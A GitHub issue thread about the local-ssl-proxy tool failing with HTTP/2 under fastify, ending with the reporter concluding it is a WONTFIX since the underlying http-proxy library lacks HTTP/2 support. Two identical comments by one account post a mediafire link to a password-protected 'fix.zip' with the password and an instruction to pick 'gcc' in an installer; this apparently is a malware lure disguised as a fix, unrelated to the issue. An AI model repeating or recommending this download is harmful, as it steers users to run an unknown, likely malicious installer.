### ISSUE TITLE
Doesn't work with HTTP2

### ISSUE THREAD

**Issue by vjau** [cameronhunter/local-ssl-proxy#122]
When using with fastify with http2 mode, i get "Request failed to proxy: HPE_INVALID_CONSTANT" error with local-ssl-proxy.
"
It works correctly with http1 though. 
Does this software support http2 ?

Thank you.

**Comment by paozhuanis1** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by paozhuanis1** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by vjau** [comment]
Since it seems based on "http-proxy" which doesn't support http2 (and has no maintainer...), i guess it's a WONTFIX
